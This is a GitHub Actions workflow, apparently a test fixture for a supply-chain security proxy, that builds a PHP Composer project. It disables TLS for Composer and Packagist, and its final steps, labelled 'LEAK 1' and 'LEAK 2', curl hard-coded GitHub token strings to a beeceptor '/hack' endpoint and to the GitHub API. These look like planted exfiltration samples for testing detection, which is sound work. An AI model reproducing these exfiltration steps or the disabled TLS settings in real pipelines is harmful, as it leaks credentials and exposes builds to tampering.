forked from coollabsio/coolify
-
Notifications
You must be signed in to change notification settings - Fork 0
151 lines (134 loc) · 5.44 KB
/
Secrets.yml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
name: Build COMPOSER Package for Secrets
on:
push:
branches: [ main ]
pull_request:
branches: [ main ]
permissions:
checks: write
contents: read
packages: read
env:
API_URL: https://app.stage.veribom.com
jobs:
create_scan_in_IR_Portal:
runs-on: ubuntu-latest
outputs:
scan_id: ${{ steps.parseResponse.outputs.scan_id }}
steps:
- name: Initiating SBOM Scan
id: createScan
uses: fjogeleit/http-request-action@v1.15.1
with:
url: '${{env.API_URL}}/utilityapi/v1/scan'
method: 'POST'
data: '{"api_key": "${{secrets.VB_API_KEY_STAGE}}"}'
- name: Parse Response
id: parseResponse
run: echo "scan_id=${{fromJSON(steps.createScan.outputs.response).data.scan_id}}" >> "$GITHUB_OUTPUT"
ecr_details:
runs-on: ubuntu-latest
outputs:
ecr_username: ${{steps.ecr_details.outputs.username}}
ecr_token: ${{steps.ecr_details.outputs.token}}
ecr_region: ${{steps.ecr_details.outputs.region}}
ecr_id: ${{steps.ecr_details.outputs.registry_id}}
steps:
- name: Fetching VB Token
id: fetchECRDetails
uses: fjogeleit/http-request-action@v1.15.1
with:
url: '${{env.API_URL}}/utilityapi/v1/registry?api_key=${{secrets.VB_API_KEY_STAGE}}'
method: 'GET'
- name: Decoding VB Token
id: parseToken
run: echo "DECODED_TOKEN=$(echo ${{ fromJson(steps.fetchECRDetails.outputs.response).data }} | base64 -d)" >> "$GITHUB_OUTPUT"
- name: ECR Details
id: ecr_details
run: |
echo "username=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).username}}" >> "$GITHUB_OUTPUT"
echo "token=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).password}}" >> "$GITHUB_OUTPUT"
echo "region=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).region}}" >> "$GITHUB_OUTPUT"
echo "registry_id=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).registry_id}}" >> "$GITHUB_OUTPUT"
start_proxy_and_build:
runs-on: ubuntu-latest
needs: [create_scan_in_IR_Portal, ecr_details]
services:
pse:
image: 282904853176.dkr.ecr.us-west-2.amazonaws.com/invisirisk/pse-proxy:dev-test
credentials:
username: ${{needs.ecr_details.outputs.ecr_username}}
password: ${{needs.ecr_details.outputs.ecr_token}}
env:
PSE_DEBUG_FLAG: --alsologtostderr
POLICY_LOG: t
INVISIRISK_JWT_TOKEN: ${{secrets.VB_API_KEY_STAGE}}
INVISIRISK_PORTAL: https://app.stage.veribom.com
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
container:
image: ubuntu:latest
options: --cap-add=NET_ADMIN
steps:
- name: Checkout the code
uses: actions/checkout@v3
- name: Install curl
run: |
apt-get update
apt-get install -y curl
- name: Set up PHP
uses: shivammathur/setup-php@v2
with:
php-version: "8.2"
extensions: pdo, pdo_mysql, gd
- name: Install system dependencies
run: |
sudo apt-get update
sudo apt-get install -y libpng-dev libjpeg-dev libfreetype6-dev zip unzip git apache2
- name: Install Composer
run: |
php -r "copy('https://getcomposer.org/installer', 'composer-setup.php');"
php composer-setup.php --install-dir=/usr/local/bin --filename=composer
php -r "unlink('composer-setup.php');"
#continue-on-error: false # This will cause the step to fail if Composer installation fails
- name: Disable tls
run: |
composer config --global disable-tls true
- name: Run PSE Action
uses: invisirisk/pse-action@v1.0.8
with:
github-token: ${{ secrets.GITHUB_TOKEN }}
SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }}
- name: Configure CA Certificates
run: |
# Extract the path of the php.ini file
PHP_INI=$(php --ini | grep "Loaded Configuration File" | awk '{print $4}')
echo "$PHP_INI"
echo "curl.cainfo=/etc/ssl/certs/pse.pem" | sudo tee -a "$PHP_INI"
echo "openssl.cafile=/etc/ssl/certs/pse.pem" | sudo tee -a "$PHP_INI"
- name: User http for packagist
run: composer config -g repo.packagist composer http://repo.packagist.org
- name: Install project dependencies
run: |
composer install --no-scripts --no-autoloader --prefer-dist --no-cache
#continue-on-error: false # This will stop the workflow if install fails
- name: Generate optimized autoload files
run: composer dump-autoload --optimize
- name: Set permissions
run: sudo chown -R www-data:www-data .
- name: Enable Apache mod_rewrite
run: sudo a2enmod rewrite
- name: Start Apache (if needed)
run: |
sudo service apache2 start
sudo apache2ctl configtest
- name: Send POST request with GitHub token (LEAK 1)
run: |
curl -k -X POST https://vbirmock.free.beeceptor.com/hack \
-H "Content-Type: application/json" \
-d '{
"GH": "ghp_DEFzmg7RHrQ2eMe2IF4NxNWQodYpab3VMXXX"
}'
- name: Make API Request (LEAK 2)
run: |
curl -k -X POST https://api.github.com/endpoint \
-d '{"name": "ghp_1234567890abcdef1234567890abcdef12345678", "description": "A description of my repository"}'